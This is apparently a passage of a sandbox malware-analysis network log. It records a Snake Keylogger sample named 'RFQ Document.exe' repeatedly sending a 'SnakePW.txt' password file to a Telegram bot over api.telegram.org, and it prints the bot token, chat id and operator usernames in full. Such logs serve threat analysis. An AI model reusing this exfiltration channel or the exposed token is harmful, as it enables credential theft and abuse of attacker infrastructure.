{"ok":true,"result":{"message_id":12917,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
334	192.168.2.4	50171	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:05 UTC	528	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fbe30b62 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:05 UTC	529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 65 33 30 62 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fbe30b62Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:06 UTC	529	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:06 UTC	529	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12918,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
335	192.168.2.4	50172	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:06 UTC	530	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fbffa78b Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:06 UTC	530	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 66 66 61 37 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fbffa78bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:06 UTC	531	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:06 UTC	531	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12919,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
336	192.168.2.4	50173	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:06 UTC	532	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fc19e195 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:06 UTC	532	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 31 39 65 31 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fc19e195Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:06 UTC	532	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:06 UTC	533	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12920,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
337	192.168.2.4	50174	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:06 UTC	533	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fc367db4 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:06 UTC	534	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 33 36 37 64 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fc367db4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:06 UTC	534	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:06 UTC	534	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12921,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
338	192.168.2.4	50175	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:06 UTC	535	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fc50b76f Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:06 UTC	535	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 35 30 62 37 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fc50b76fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:06 UTC	536	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:06 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12922,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
339	192.168.2.4	50176	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:06 UTC	536	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fc6d5398 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:06 UTC	537	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 36 64 35 33 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fc6d5398Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:06 UTC	537	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:06 UTC	538	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12923,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49810	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:27 UTC	54	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c5f64e24 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:27 UTC	54	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 66 36 34 65 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c5f64e24Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:27 UTC	54	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:27 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:27 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12615,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
340	192.168.2.4	50177	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:07 UTC	538	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fc852b9a Host: api.telegram.org Content-Length: 407
